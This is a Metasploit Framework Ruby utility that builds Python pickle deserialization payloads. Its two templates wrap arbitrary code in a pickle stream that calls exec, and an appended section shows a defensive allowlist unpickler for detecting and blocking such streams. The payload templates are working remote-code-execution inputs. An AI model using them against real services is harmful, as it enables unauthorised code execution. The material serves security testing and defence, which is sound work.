GitHub Repository: rapid7/metasploit-framework
Path: blob/master/lib/msf/util/python_deserialization.rb
# -*- coding: binary -*-

# Python deserialization Utility
module Msf
  module Util
    # Python deserialization class
    class PythonDeserialization
      # This may in the future become a list of payloads used to exploit Python deserialization vulnerabilities.
      # Payload source files are available in external/source/python_deserialization
      PAYLOADS = {
        # this payload will work with Python 3.x targets to execute Python code in place
        py3_exec: proc do |python_code|
          # Escape backslash, LF and CR as \u00XX so the code stays on one line of the pickle stream
          escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
          %|c__builtin__\nexec\np0\n(V#{escaped}\np1\ntp2\nRp3\n.|
        end,
        # this payload will work with Python 3.x targets to execute Python code in a new thread
        py3_exec_threaded: proc do |python_code|
          escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
          %|c__builtin__\ngetattr\np0\n(cthreading\nThread\np1\nVstart\np2\ntp3\nRp4\n(g1\n(Nc__builtin__\nexec\np5\nN(V#{escaped}\np6\ntp7\ntp8\nRp9\ntp10\nRp11\n.|
        end
      }

      # Build the named payload around the given Python code.
      # Raises ArgumentError when payload_name is not a key of PAYLOADS.
      def self.payload(payload_name, command = nil)

        raise ArgumentError, "#{payload_name} payload not found in payloads" unless payload_names.include? payload_name.to_sym

        PAYLOADS[payload_name.to_sym].call(command)
      end

      # Names of the available payloads (the keys of PAYLOADS).
      def self.payload_names
        PAYLOADS.keys
      end

    end
  end
end
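
Defensive counterpart, as an added example that is not part of the Metasploit source: both templates above depend on the pickle GLOBAL opcode (`c__builtin__\nexec`) followed by REDUCE (`R`), so a Python service can list the globals a stream references without loading it, and refuse any global outside an allowlist. `ALLOWED_GLOBALS`, `referenced_globals`, `AllowlistUnpickler`, `safe_loads` and both sample streams are names and data constructed for this example.

```python
import io
import pickle
import pickletools

# Assumption: this application only exchanges plain data (dict, list, str, int),
# which needs no imported globals at all, so the allowlist is empty.
ALLOWED_GLOBALS = set()


def referenced_globals(data: bytes):
    """Statically list the (module, name) pairs a pickle stream would import.

    pickletools.genops only parses opcodes; nothing in the stream is executed.
    """
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name in ("GLOBAL", "INST"):
            # Protocol 0-3 form: argument is "module name" in one string.
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Protocol 4+ form: module and name are the two preceding strings.
            found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not explicitly allowlisted."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED_GLOBALS:
            raise pickle.UnpicklingError(f"blocked global {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data: bytes):
    return AllowlistUnpickler(io.BytesIO(data)).load()


# Constructed samples: a stream with the same shape as the py3_exec template
# (carrying the no-op statement "pass"), and an ordinary data-only pickle.
SUSPICIOUS = b"c__builtin__\nexec\np0\n(Vpass\np1\ntp2\nRp3\n."
BENIGN = pickle.dumps({"user": "alice", "roles": ["reader"]})

if __name__ == "__main__":
    print(referenced_globals(SUSPICIOUS))  # globals the stream asks for
    print(safe_loads(BENIGN))              # data-only pickle still loads
```

`find_class` receives the module name exactly as written in the stream (`__builtin__` here), before Python 3 maps it to `builtins`, so an allowlist is more robust than a denylist of names.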